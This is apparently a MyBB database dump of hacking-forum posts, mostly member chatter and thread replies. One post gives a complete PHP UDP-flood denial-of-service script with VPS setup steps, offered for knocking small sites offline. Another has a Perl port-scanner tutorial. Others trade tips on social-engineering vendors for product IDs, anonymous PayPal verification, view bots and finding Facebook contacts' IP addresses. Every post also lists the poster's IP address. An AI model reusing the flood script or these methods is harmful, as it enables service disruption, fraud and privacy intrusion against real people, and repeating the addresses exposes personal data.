INSERT INTO mybb_posts VALUES('5600', '994', '5596', '18', 'RE: Getting IP\'s of Facebook contacts! [TUT]', '0', '258', 'PiXEL^OG', '1350654086', 'What if your victim is not friends with you on FB or dose not have Fb in the first place? \r\n\r\nI have a more easier and fail safe method for this , i might post it later.\r\n\r\nAnyways Thanks for smartsniff , did not know about that program :)', '139.190.235.246', '-1950422026', '0', '0', '258', '1350654123', '1', '0ef5e6b3bf26d220c40f42674c908088', '0', '1350654123'); INSERT INTO mybb_posts VALUES('5601', '994', '5596', '18', 'RE: Getting IP\'s of Facebook contacts! [TUT]', '0', '62', 'R?????zo?', '1350654184', 'yeah but it clearly says of facebook contacts on the tittle, assuming they are already your friends in the first place and have facebook :P', '89.214.163.182', '1507238838', '1', '0', '62', '1350654205', '1', '42c4a6cadfdaeeab093c2b1748ea087f', '0', '1350654205'); INSERT INTO mybb_posts VALUES('5602', '992', '5593', '17', 'RE: [GUIDE] Verifying a PayPal Account FREE+ANONYMOUSLY', '0', '258', 'PiXEL^OG', '1350654234', 'This does not work anymore , Its out dated\r\n\r\nEntropay removed the bank account option', '139.190.235.246', '-1950422026', '0', '0', '258', '1350654252', '1', 'db2528bd4e522025ee2c7685f4f75af8', '0', '1350654252'); INSERT INTO mybb_posts VALUES('5603', '994', '5601', '18', 'RE: Getting IP\'s of Facebook contacts! [TUT]', '0', '258', 'PiXEL^OG', '1350654584', '[quote=\'R?????zo?\' pid=\'5601\' dateline=\'1350654184\']\r\nyeah but it clearly says of facebook contacts on the tittle, assuming they are already your friends in the first place and have facebook :P\r\n[/quote]\r\n\r\nlol i completely forgot about that lmao XD', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', 'd42a22c2133f5c6dfc356039c95ebd3d', '0', '0'); INSERT INTO mybb_posts VALUES('5604', '992', '5593', '17', 'RE: [GUIDE] Verifying a PayPal Account FREE+ANONYMOUSLY', '0', '62', 'R?????zo?', '1350654913', 'Oh I did not tested that, I will close it then, thanks for iform me.', '89.214.163.182', '1507238838', '1', '0', '0', '0', '1', '2e95b3cb0fac430416dadad3472905a4', '0', '0'); INSERT INTO mybb_posts VALUES('5605', '690', '3516', '69', 'RE: What are your fav or which coding languages do you know?', '0', '62', 'R?????zo?', '1350655008', 'C# is the one I know the most, some VB, HTML AND CSS, PHP, Java and lua', '89.214.163.182', '1507238838', '1', '0', '0', '0', '1', '48025f970ebd22f0dacc7379dcafcd77', '0', '0'); INSERT INTO mybb_posts VALUES('5606', '995', '0', '16', 'How do you get PID\'s?', '0', '62', 'R?????zo?', '1350664827', 'I\'m trying to SE logitech but I can\'t find a way to get PID\'s, I\'m using ebay and ask the sellers on used items but they seem to reply me that I will use that information for warranty purposes with logitech.', '46.50.76.153', '775048345', '1', '0', '0', '0', '1', '857ef1613cc9262f2ca985784aac66cf', '0', '0'); INSERT INTO mybb_posts VALUES('5607', '889', '4842', '3', 'RE: Vote for a new theme', '0', '222', 'Exposé', '1350671730', 'I voted to just redo the header but idk....', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'b7fd04025940b7822168fd44e17bc416', '0', '0'); INSERT INTO mybb_posts VALUES('5608', '983', '5495', '47', 'RE: MC PREMIUM GIVE AWAY', '0', '222', 'Exposé', '1350671773', 'Dam I think I was too late:P...maybe next time', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '71fbf17c7c5e74aaf9240c25b09c00ef', '0', '0'); INSERT INTO mybb_posts VALUES('5609', '974', '5455', '61', 'RE: Get Abs Sitting at your Computer in 2 weeks!', '0', '222', 'Exposé', '1350671804', 'Lmao I already got a six pack...but thanks for this :p', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '1a7d9dd3aedca39d1423d7300aeb71df', '0', '0'); INSERT INTO mybb_posts VALUES('5610', '944', '5284', '66', 'RE: What\'s your BF3 Method-ology?', '0', '222', 'Exposé', '1350671842', 'Lmao nice...I like choppers but I always tend to crash them', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '47ff72821127582df6f9b079f4d85918', '0', '0'); INSERT INTO mybb_posts VALUES('5611', '983', '5495', '47', 'RE: MC PREMIUM GIVE AWAY', '0', '257', 'XxTREYZxX', '1350672568', 'they might still work ;\ntry them', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', '9900596ac6e368c457e0390faf6ec127', '0', '0'); INSERT INTO mybb_posts VALUES('5612', '995', '5606', '16', 'RE: How do you get PID\'s?', '0', '222', 'Exposé', '1350673803', 'Easy just use the Ebay+Craigslist method. Works for me everytime... :D', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'f107795760011fe7449522c5660184c4', '0', '0'); INSERT INTO mybb_posts VALUES('5613', '126', '315', '15', 'RE: Adf.ly Bot', '0', '82', 'iTzIpod', '1350674966', 'Okay. Thank you.\n\nIt\'s really slow. Doesn\'t give much views.\nAlso, takes a while to view it. Lol\n\n200 views in like 3 hours?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e39ff6b51fa47770e2b262802c4c30a4', '0', '0'); INSERT INTO mybb_posts VALUES('5614', '948', '5336', '74', 'RE: MINECRAFT world download', '0', '82', 'iTzIpod', '1350675004', 'It\'s outdated then...\n\n\n/Request Close Thread', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a8d596ea6a381459929c40815ddaa36d', '0', '0'); INSERT INTO mybb_posts VALUES('5615', '943', '5283', '74', 'RE: MINECRAFT PREMIUM GIVEAWAY(no surveys)', '0', '82', 'iTzIpod', '1350675121', 'Okay. Whatever you say. I\'m saying it doesn\'t work.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f8d7cf04556a8c99aa09007b4dfeb8ed', '0', '0'); INSERT INTO mybb_posts VALUES('5616', '968', '5444', '61', 'RE: [Ebook] [HOT] Get Any Girls Nudes You Want [HOT] [Ebook]', '0', '82', 'iTzIpod', '1350675160', 'Lool.\nWill check it out.\nNice share :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '68f5f558735fb79db051c8c4842a11f8', '0', '0'); INSERT INTO mybb_posts VALUES('5617', '961', '5425', '61', 'RE: ??$$[CAN NEVER BE SATURATED] How To Earn $50\\Week! ??', '0', '82', 'iTzIpod', '1350675250', 'I don\'t like this method.\n\nNatureBucks is annoying.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '334f4826d0aa0deda64fcfdefea4cd16', '0', '0'); INSERT INTO mybb_posts VALUES('5618', '889', '4842', '3', 'RE: Vote for a new theme', '0', '1', 't3h jok3r', '1350675824', 'I have two members bugging me saying that they want a new theme so I thought I needed to change it.\n\nLets see how many people want to stay on this theme.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b9ef53e370fd78d7a3545dbd3d56c7f8', '0', '0'); INSERT INTO mybb_posts VALUES('5619', '943', '5283', '74', 'RE: MINECRAFT PREMIUM GIVEAWAY(no surveys)', '0', '257', 'XxTREYZxX', '1350676436', '[img]http://grab.by/gRWK[/img]\r\nthere you go !', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', 'aa9e9afccc570b5fcf2a07d0959a8ab1', '0', '0'); INSERT INTO mybb_posts VALUES('5620', '948', '5614', '74', 'RE: MINECRAFT world download', '0', '257', 'XxTREYZxX', '1350676530', '[quote=\'iTzIpod\' pid=\'5614\' dateline=\'1350675004\']\r\nIt\'s outdated then...\r\n\r\n\r\n/Request Close Thread\r\n[/quote]\r\n\r\nlol i was just about to close it.', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', 'dcf26a010c32bf12a0f75795f44f524f', '0', '0'); INSERT INTO mybb_posts VALUES('5621', '995', '5606', '16', 'RE: How do you get PID\'s?', '0', '1', 't3h jok3r', '1350676704', 'Say that you need to confirm that they really have the product and yes you will check how long is the warranty for because you don\'t want to buy something that has no warranty by the company and just in case it breaks the day I get it, I can\'t ask you for a refund so I would have to obviously check in with the company.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '0c61d9f518340f7a7f355ddd9f3faf5d', '0', '0'); INSERT INTO mybb_posts VALUES('5622', '996', '0', '19', '[Junk]1000 PREMIUM ACCOUNTS!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!', '0', '257', 'XxTREYZxX', '1350676921', 'THREAD CLOSED SORRY GUYS\r\n\r\nSORRY FOR THIS ;)', '203.104.11.43', '-882373845', '1', '0', '257', '1350679147', '1', '4dcfc65a0a47b94512556d266ea823a2', '0', '1350679147'); INSERT INTO mybb_posts VALUES('5628', '995', '5606', '16', 'RE: How do you get PID\'s?', '0', '62', 'R?????zo?', '1350679449', 'yeah the guy even sent me a pic :D\nI might get my keyboard now :P', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '7a665cf25019494886dcdfb728967e78', '0', '0'); INSERT INTO mybb_posts VALUES('5629', '991', '5592', '14', 'RE: VPN Accounts With Guide :)', '0', '257', 'XxTREYZxX', '1350680147', 'ahah thanks for the great share and keepup the good work :)', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '5edb9157028b260b31d86ad097c1d74b', '0', '0'); INSERT INTO mybb_posts VALUES('5630', '968', '5616', '61', 'RE: [Ebook] [HOT] Get Any Girls Nudes You Want [HOT] [Ebook]', '0', '62', 'R?????zo?', '1350680617', '[quote=\'iTzIpod\' pid=\'5616\' dateline=\'1350675160\']\r\nLool.\r\nWill check it out.\r\nNice share :)\r\n[/quote]\r\n\r\nLooks like you have some girl in mind :P', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '9bf8a19d11d97ae0833f17922d7a5d6e', '0', '0'); INSERT INTO mybb_posts VALUES('5631', '878', '4748', '16', 'RE: ƒ???????????g\'s Dell SE Method....', '0', '214', 'Rave™', '1350682220', 'Send me a copy ? <3333\nThanks man,', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', '6f4681810b7b2b8bec46cb3fbbfd687d', '0', '0'); INSERT INTO mybb_posts VALUES('5633', '821', '4294', '28', 'RE: What\'s on your mind or what are your future plans?', '0', '222', 'Exposé', '1350684664', 'Let\'s not get technical here.....and YOLO is right :P', '66.87.31.245', '1113006069', '1', '0', '0', '0', '1', 'f082f825ab2c978629b0e74922d2360a', '0', '0'); INSERT INTO mybb_posts VALUES('5634', '936', '5562', '18', 'RE: 4 adf.ly bots with proxygrabber', '0', '1', 't3h jok3r', '1350684767', '[quote=\'R?????zo?\' pid=\'5562\' dateline=\'1350633926\']\r\nThanks for this, i will try it out later :)\r\nCan this get you banned though?\r\n[/quote]\r\n\r\nYes only if you cross the limit such as 1K views under a day etc.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '7fb7a0dc0efd3b5cc29b94efb2c8e0bb', '0', '0'); INSERT INTO mybb_posts VALUES('5635', '190', '665', '56', 'RE: Copy and paste game', '0', '199', 'Anonymous™', '1350686366', 'http://www.youtube.com/watch?v=9bZkp7q19f0&feature=g-vrec', '85.230.51.22', '1441149718', '1', '0', '0', '0', '1', 'fe64799819768754ec5d521dc5bcf92e', '0', '0'); INSERT INTO mybb_posts VALUES('5636', '907', '5586', '7', 'RE: Ohio Bus Driver Uppercuts Lady | Mortal Kombat Edit', '0', '3', '??????????¢™', '1350690790', '[quote=\'Apathy\' pid=\'5586\' dateline=\'1350649045\']\r\n[quote=\'??????????¢™\' pid=\'5528\' dateline=\'1350619527\']\r\n[quote=\'Apathy\' pid=\'5527\' dateline=\'1350617582\']\r\nNot bad. I like someone else footage better though.\r\n[/quote]\r\n\r\nThats okay with me, I didnt do a pro edit because im not an editor just a gamer.\r\n[/quote]\r\n\r\nI meant their is better camera footage.\r\n[/quote]\r\n\r\nOh, I used this one because it is the longest.', '75.22.48.43', '1259745323', '1', '0', '0', '0', '1', '9d14129a4df51bb5910cca5070c9e41b', '0', '0'); INSERT INTO mybb_posts VALUES('5637', '987', '5542', '13', 'RE: [TUT] Using Metasploit to harvest all emails of a website', '0', '228', 'VirtualLegend', '1350697094', 'Small but Very Good Tutorial.\n\nMAKE MORE !!!', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'd53252f4f67859f0736c1a52db668480', '0', '0'); INSERT INTO mybb_posts VALUES('5638', '980', '5466', '43', 'RE: 50,000 CD KEYS OF PC GAMES', '0', '228', 'VirtualLegend', '1350697332', 'Woow What a Hugh List \n\nThanks for the share', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '4e025ec3fc0d9da0daa520c6fad290e5', '0', '0'); INSERT INTO mybb_posts VALUES('5639', '928', '5415', '49', 'RE: MOTM', '0', '2', 'Apathy', '1350697699', '[quote=\'iTzIpod\' pid=\'5415\' dateline=\'1350594534\']\r\nApathy, you\'re just too inactive. You need to post more.\r\nAll everyone asks from you.\r\n\r\nAs for the thread,\r\nI think we should do this. And a LH Weekly News Series.\r\n[/quote]\r\n\r\nI do not need to be a post whore. :P I post on what needs it or when I want to. I have been posting more often recently anyway.:)', '173.206.138.180', '-1378973004', '0', '0', '0', '0', '1', '92d4a7be15e7d10434582f10e3222150', '0', '0'); INSERT INTO mybb_posts VALUES('5640', '990', '5545', '12', 'RE: How to send free anonymous SMS to your friends mobile phone from you\'re PC', '0', '228', 'VirtualLegend', '1350697903', 'Why do you copy and past?\n\nhttp://techotoys.net/2011/07/how-to-send-free-anonymous-fake-sms-to-friends-number.html', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '2fd20e79c162a8b955f307edfa74638e', '0', '0'); INSERT INTO mybb_posts VALUES('5641', '947', '5329', '8', 'RE: GANGNAM STYLE', '0', '228', 'VirtualLegend', '1350697968', 'I Like the 8bit version of it :D', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '67287e33ab8e60a876da9c1ad955c3c0', '0', '0'); INSERT INTO mybb_posts VALUES('5642', '985', '5534', '7', 'RE: World\'s Longest Email Address', '0', '228', 'VirtualLegend', '1350698493', 'I think I\'m gonna make a website with a longer adress than this one :P', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '087b1c1a624fce92c637cab8b2b1c182', '0', '0'); INSERT INTO mybb_posts VALUES('5643', '901', '4930', '19', 'RE: L33THacking Skype Resolver!', '0', '1', 't3h jok3r', '1350699811', 'Works for 1 person out of 200+ members on LH > LEGIT!', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '536e93fdb1d3577b533017fb0940b5f4', '0', '0'); INSERT INTO mybb_posts VALUES('5644', '964', '5433', '19', 'RE: [UPDATED] L33T Hacking Skype Resolver', '0', '1', 't3h jok3r', '1350699992', 'Bookmarked it and moved it to the right section.\n\nThanks.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b7829938401f501369ca409c4ce0b087', '0', '0'); INSERT INTO mybb_posts VALUES('5645', '901', '4930', '19', '[Junk]L33THacking Skype Resolver!', '0', '1', 't3h jok3r', '1350700030', 'This thread has been junked.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO mybb_posts VALUES('5646', '997', '0', '14', 'Discovery Channel - Track Me If You Can 2010', '0', '5', 'Timmy', '1350700870', '[b]What is \"Track me if you can\"?[/b]\r\n\r\nIt\'s about a 50 minutes episode that was displayed on Discovery Channel on how to remain anonymous and become impossible to be tracked. This will show you various stuff such as creating hats that keep you safe from cameras, avoiding scans or tracking on your ID card, hidden bugs and trackers in your car and much more.\r\n\r\nIt was on YouTube but now it\'s completely removed. Anonymous recommended this video a year ago.\r\n\r\nDownload Link: http://thepiratebay.se/torrent/5968024', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'd897855dbd676b86071e8ba7b6284df2', '0', '0'); INSERT INTO mybb_posts VALUES('5647', '688', '3508', '67', 'RE: [PHP] Email Bomber Source', '0', '5', 'Timmy', '1350702476', 'Thanks for the source looks legit.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '8c2994ab74645ea85c011c69d84ff674', '0', '0'); INSERT INTO mybb_posts VALUES('5648', '690', '3516', '69', 'RE: What are your fav or which coding languages do you know?', '0', '5', 'Timmy', '1350702581', 'I only know html :\'(\n\nCSS is similar to HTML so won\'t mention it.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '9f69105e7507f439cf15fa2fea8529f3', '0', '0'); INSERT INTO mybb_posts VALUES('5649', '998', '0', '12', 'Port Scanning Tutorial', '0', '5', 'Timmy', '1350703537', 'Code:\r\n\r\n#!/usr/bin/perl\r\n# TCP Port scanner\r\n# Coded By Disturbed_1\r\n\r\nprint q{\r\n=================================================\r\n= =\r\n= Coded By =\r\n= =\r\n= Disturbed_1 =\r\n= =\r\n= Team Sp0il =\r\n= =\r\n= Sp0il.com =\r\n= =\r\n=================================================\r\n};\r\nuse IO::Socket;\r\nprint \"Target: \";\r\nchop ($target = <stdin>);\r\nprint \"Min Port: \";\r\nchop ($port = <stdin>);\r\nprint \"Max Port: \";\r\nchop ($maxport = <stdin>);\r\nmy ( $daddr );\r\n\r\n{\r\n\r\n$daddr = inet_aton($target) || die(\"Failed to locate target host: $target\");\r\n\r\nprint \" ================================================================\\n\";\r\nprint \" Scanning $target on ports $port-$maxport\\n\";\r\nprint \" This might take a while depending on how many ports you have\\n\";\r\nprint \" ================================================================\\n\";\r\nforeach (; $port<=$maxport; $port++) {\r\nprint \"\\n == Scanning port $port ==\";\r\n\r\nif( IO::Socket::INET->new(PeerAddr=>\"$target:$port\",Proto=>\'tcp\',Timeout=>1))\r\n{\r\nprint \"\\n==== Port $port is open ====\\n\" ; \r\n}\r\nelse{\r\nprint \"\\nPort $port is NOT open\\n\";\r\n}\r\n}\r\n}\r\n\r\nprint \"\\n\\n\\nFinished Scanning $target up to port $maxport\\n\\n\";\r\nprint \"\\n Thanks for using my port scanner\\n\";\r\nprint \"\\n - Disturbed_1\";\r\nexit (0);\r\n--------------------------------------------------------------------------------------------------------------------------------------\r\nFirst copy the script and save it as \r\npscan.pl\r\n\r\nin the \r\nc:/perl/bin/\r\nDirectory...\r\n\r\nNow open up Command Prompt\r\nand type: Code: \"cd ..\\..\\perl\\bin\r\n\r\nNow type: \"pscan.pl\"\r\n\r\nNow type in a host (URL)\r\n\r\nThen type in the starting port I am using 21(FTP port)\r\n\r\nNow you must type the ending port I will use 80(Public Port)\r\n\r\nNow scan...\r\n\r\nNow you wait...\r\n\r\nAfter is scans ports 21-80\r\n\r\nYour window should look like\r\n\r\nNow if you look back you can see which ports are opened and which are closed...\r\n\r\nClosed:\r\n\r\nCode:\r\nPort # is NOT open\r\n\r\nOpen:\r\n\r\nCode:\r\n==== Port # is open ====\r\n\r\nScanning:\r\n\r\nCode:\r\n== Scanning port # ==\r\n\r\n\r\nSo if you look through the commands these ports are open...\r\n\r\n\r\nCode:\r\n\r\n21\r\n25\r\n26\r\n53\r\n80\r\n\r\n\r\n--------------------------------------------------------------------------------------------------------------------------------------\r\n\r\nHope this was helpful to some of you~\r\n\r\nEnjoy~', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '868b7434897d63384be3fcadafadfda8', '0', '0'); INSERT INTO mybb_posts VALUES('5650', '999', '0', '67', '[Guide] How To Setup A PHP DoS (Shell) Script', '0', '5', 'Timmy', '1350703914', 'UDP flood php scripts can be extremely strong, the strength of it depends on the strength of the server which it is hosted on. These can easily take down small websites/forums by using a UDP flood php script hosted off a $10 a month unmetered bandwidth Linux vps. The vps can be purchased at http://turbovps.com/en/VPS/Linux-Unmetered-VPS (Buy the $15.00 vps)\r\n\r\nYou will need:\r\n\r\nLinux Vps (Ubuntu OS)\r\nFileZilla ftp client\r\nPutty\r\n\r\n-\r\n\r\nFirst connect to your vps via ssh through putty. Than login to your vps.\r\n\r\nNavigate to this location /etc/apt/sources.list\r\nAdd these lines to it and click save.\r\ndeb http://us.archive.ubuntu.com/ubuntu dapper universe main restricted universe\r\ndeb http://security.ubuntu.com/ubuntu dapper-security universe\r\n\r\nReplace \"Dapper\" with your ubuntu version ex. Jaunty_9.04 , Karmic_9.10, Intrepid_8.10 etc\r\nThen enter your terminal and type\r\nsudo apt-get update\r\n\r\nNow for actually installing it.\r\nEnter your terminal again and type the following in order.\r\n\r\nsudo apt-get install apache2\r\n\r\nsudo apt-get install php5\r\n\r\nsudo apt-get install libapache2-mod-php5\r\n\r\nsudo /etc/init.d/apache2 restart\r\n\r\nNow take this script below and paste it into a notepad file and save it as shell.php.\r\n\r\n[code]\r\n<html>\r\n<body>\r\n<center>\r\n<font color=\"00FF00\">\r\n<pre>\r\n__ _ _ _ \r\n/ ____| | | | |\r\n(___ | |__ ___| | |\r\n\\___ \\| \'_ \\ / _ \\ | |\r\n__ _) | | | | __/ | |\r\n__/|_| |_|\\___|_|_|\r\n</pre>\r\n<STYLE>\r\ninput{\r\nbackground-color: #00FF00; font-size: 8pt; color: #00; font-family: Tahoma; border: 1 solid #66;\r\n}\r\nbutton{\r\nbackground-color: #00FF00; font-size: 8pt; color: #00; font-family: Tahoma; border: 1 solid #66;\r\n}\r\nbody { \r\nbackground-color: #00;\r\n}\r\n</style>\r\n<?php\r\n//UDP\r\nif(isset($_GET[\'host\'])&&isset($_GET[\'time\'])){\r\n $packets = 0;\r\n ignore_user_abort(TRUE);\r\n set_time_limit(0);\r\n\r\n $exec_time = $_GET[\'time\'];\r\n\r\n $time = time();\r\n //print \"Started: \".time(\'d-m-y h:i:s\').\"<br>\";\r\n $max_time = $time+$exec_time;\r\n\r\n $host = $_GET[\'host\'];\r\n\r\n for($i=0;$i<65000;$i++){\r\n $out .= \'X\';\r\n }\r\n while(1){\r\n $packets++;\r\n if(time() > $max_time){\r\n break;\r\n }\r\n $rand = rand(1,65000);\r\n $fp = fsockopen(\'udp://\'.$host, $rand, $errno, $errstr, 5);\r\n if($fp){\r\n fwrite($fp, $out);\r\n fclose($fp);\r\n }\r\n }\r\n echo \"<br><b>UDP Flood</b><br>Completed with $packets (\" . round(($packets*65)/1024, 2) . \" MB) packets averaging \". round($packets/$exec_time, 2) . \" packets per second \\n\";\r\n echo \'<br><br>\r\n <form action=\"\'.$surl.\'\" method=GET>\r\n <input type=\"hidden\" name=\"act\" value=\"phptools\">\r\n Host: <br><input type=text name=host><br>\r\n Length (seconds): <br><input type=text name=time><br>\r\n <input type=submit value=Go></form>\';\r\n}else{ echo \'<br><b>UDP Flood</b><br>\r\n <form action=? method=GET>\r\n <input type=\"hidden\" name=\"act\" value=\"phptools\">\r\n Host: <br><input type=text name=host value=><br>\r\n Length (seconds): <br><input type=text name=time value=><br><br>\r\n <input type=submit value=Go></form>\';\r\n}\r\n?>\r\n</center>\r\n</body>\r\n</html>\r\n[/code]\r\n\r\nNow open FileZilla and connect to your vps and upload the shell.php file to your /var/www/ directory. Than access it via web, type in the IP at the top, and time-in-seconds to disconnect them at the bottom, click go and your target is now disconnected.\r\n\r\n-\r\n\r\nHope this helped. If you have any questions feel free to post them.', '72.231.24.165', '1223104677', '1', '0', '5', '1350703981', '1', '79786de018f7caa955fd2d6e05e634d1', '0', '1350703981'); INSERT INTO mybb_posts VALUES('5651', '964', '5433', '19', 'RE: [UPDATED] L33T Hacking Skype Resolver', '0', '100', '??zg???g????61', '1350704021', ':D awesome this works, thanks Rave.', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '3647294ccb8780a506989e8f723f5f71', '0', '0'); INSERT INTO mybb_posts VALUES('5652', '997', '5646', '14', 'RE: Discovery Channel - Track Me If You Can 2010', '0', '2', 'Apathy', '1350704219', 'Sounds cool I might check it out.', '173.206.138.180', '-1378973004', '0', '0', '0', '0', '1', '1b8341ddb42b1f2938428abb07d2ccfe', '0', '0'); INSERT INTO mybb_posts VALUES('5653', '990', '5640', '12', 'RE: How to send free anonymous SMS to your friends mobile phone from you\'re PC', '0', '100', '??zg???g????61', '1350704257', '[quote=\'VirtualLegend\' pid=\'5640\' dateline=\'1350697903\']\r\nWhy do you copy and past?\r\n\r\nhttp://techotoys.net/2011/07/how-to-send-free-anonymous-fake-sms-to-friends-number.html\r\n[/quote]\r\n\r\nLol busted...', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '2e6e2cf3d54c94c3c65d2ca93d9541fb', '0', '0'); INSERT INTO mybb_posts VALUES('5654', '1000', '0', '3', 'Congrats NXK and ??????????¢™', '0', '222', 'Exposé', '1350705335', 'Just noticed that NXK has been promoted to admin and ??????????¢™ is now supermod. Hopefully this is a great staff change and is a positive change for the site. I think it is.... congrats again :D', '74.76.76.132', '1246514308', '1', '0', '222', '1350705418', '1', 'a223f95dbbec76346e76b074c1538eb7', '0', '1350705418'); INSERT INTO mybb_posts VALUES('5655', '1000', '5654', '3', 'RE: Congrats NXK and ??????????¢™', '0', '3', '??????????¢™', '1350705436', 'Thanks, I really appreciate it.', '75.22.48.43', '1259745323', '1', '0', '0', '0', '1', 'e6baeef50c9fbdc877b50a65aa7f6ce3', '0', '0'); INSERT INTO mybb_posts VALUES('5656', '774', '3992', '19', '[Junk]What is expected of you!', '0', '1', 't3h jok3r', '1350705866', 'This thread has been junked.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO mybb_posts VALUES('5657', '985', '5548', '7', 'RE: World\'s Longest Email Address', '0', '205', 'mothered', '1350706587', '[quote=\'XTr3ME PiX3L\' pid=\'5548\' dateline=\'1350631058\']\r\nI don\'t see the point in it , this can\'t annoy anyone people just copy and paste so its not like someone\'s gonna bother reading all that\r\n\r\nThough u can troll people with it..\r\n[/quote]\r\n\r\nJust like ??????????¢™ mentioned above, It\'s more so the reaction on people once they see It, and not whether a given person tries to read It.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '6487ef4febdf23cc9efae478250b8418', '0', '0'); INSERT INTO mybb_posts VALUES('5658', '1000', '5654', '3', 'RE: Congrats NXK and ??????????¢™', '0', '205', 'mothered', '1350706714', 'Well done boys, congratulations to you both :)', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '01b3724ef8e33ed970a926a629d50830', '0', '0'); INSERT INTO mybb_posts VALUES('5659', '1000', '5654', '3', 'RE: Congrats NXK and ??????????¢™', '0', '2', 'Apathy', '1350706816', 'Congrats. I am taking a break atm.', '173.206.138.180', '-1378973004', '0', '0', '0', '0', '1', 'a4a405e1431143075c0c3ec7ba336e41', '0', '0'); INSERT INTO mybb_posts VALUES('5660', '1001', '0', '7', 'Shady URL', '0', '205', 'mothered', '1350707012', 'Greetz to all,\r\n\r\nI came across this on another forum, so I don\'t take credit In finding It myself.\r\n\r\nBasically you can make a URL of choice, look suspicious and frightening. Try It for yourself, It\'s quite cool.\r\n\r\nLink: http://www.shadyurl.com/index.php', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '10b9b26ed166c9fd762fd730e721a725', '0', '0'); INSERT INTO mybb_posts VALUES('5661', '1001', '5660', '7', 'RE: Shady URL', '0', '2', 'Apathy', '1350707126', 'http://5z8.info/dogporn_v8y0iy_startdownload Your welcome.', '173.206.138.180', '-1378973004', '0', '0', '0', '0', '1', '68298811220b917c3dd0861fd78a135f', '0', '0'); INSERT INTO mybb_posts VALUES('5662', '1001', '5660', '7', 'RE: Shady URL', '0', '222', 'Exposé', '1350707139', 'Lmao Jok3r rename the site to this bro....rofl\n\nhttp://5z8.info/myspace-of-sex_c4j1xo_foreign-brides (redirects to L33thacking)\n\nNice share mothered :P', '74.76.76.132', '1246514308', '1', '0', '222', '1350707171', '1', '1388456df80d777cfbe57ab1f98ba309', '0', '1350707171'); INSERT INTO mybb_posts VALUES('5663', '993', '5595', '12', 'RE: Most complete guide to be anonymous', '0', '205', 'mothered', '1350707173', 'No replies?\r\n\r\nAmazing thread. Bookmarked.\r\nThanks mate.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'c332ce088160ef868c44b99fb3b27731', '0', '0'); INSERT INTO mybb_posts VALUES('5664', '878', '4748', '16', 'RE: ƒ???????????g\'s Dell SE Method....', '0', '222', 'Exposé', '1350707295', 'Yeh sure lol...I\'ll send it when I have a chance', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '7c3429ad0ecb6d496d567ac4d42a8a61', '0', '0'); INSERT INTO mybb_posts VALUES('5665', '990', '5545', '12', 'RE: How to send free anonymous SMS to your friends mobile phone from you\'re PC', '0', '205', 'mothered', '1350707300', 'If not written by yourself, you definitely must credit your sources.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '27c3a58f760ce6cc8883a7351b6f4ac7', '0', '0'); INSERT INTO mybb_posts VALUES('5666', '1002', '0', '3', 'New mods and forum updates', '0', '1', 't3h jok3r', '1350707318', 'Firstly, Congratulations to NXK for becoming the new Admin and ??????????¢™ the new Staff member. Apathy is now a Staff member. We need one mod, we will be posting applications or do a community vote very soon.\r\n\r\nFearless Group has been deleted upon leaders request and the RATTERs group has changed to DDoSers. Sounds skiddy but there you will get access to booters, source, tutorial on creating DoSers etc.\r\n\r\nThe PIDs and Movie Rips section is now public but you are required a password. In order to get a password, make sure you have 35 posts or more then PM ??????????¢™ requesting the password. Save it in your notepad and please do not give the password out to anyone.\r\n\r\nFor the new theme, I have decided to stay back on the current theme and make some changes to the theme.\r\n\r\n[b]POST HERE AND PM ME[/b] :- Post here and PM me is not allowed on LH. Due to the problems we are having with AF, we are allowing Post here and PM me for a [u]week only[/u] so they don\'t leech our content.\r\n\r\nWe have also beat our previous months posting record. Thanks for contributing.\r\n\r\n[spoiler][IMG]http://imageshack.us/a/img593/1364/statsij.png[/IMG][/spoiler]\r\n\r\nWe have updated our rules help document which can be viewed [url=http://l33thacking.net/misc.php?action=help&hid=8]here[/url]\r\n\r\nForum games has a new rule, check the forum for the new rule.\r\n\r\nHope you like the updates.\r\n\r\n**Bonus: https://sphotos-b.xx.fbcdn.net/hphotos-snc6/10449_158917320918415_1748190171_n.jpg\r\n\r\nThanks for ??????????¢™ for the picture. 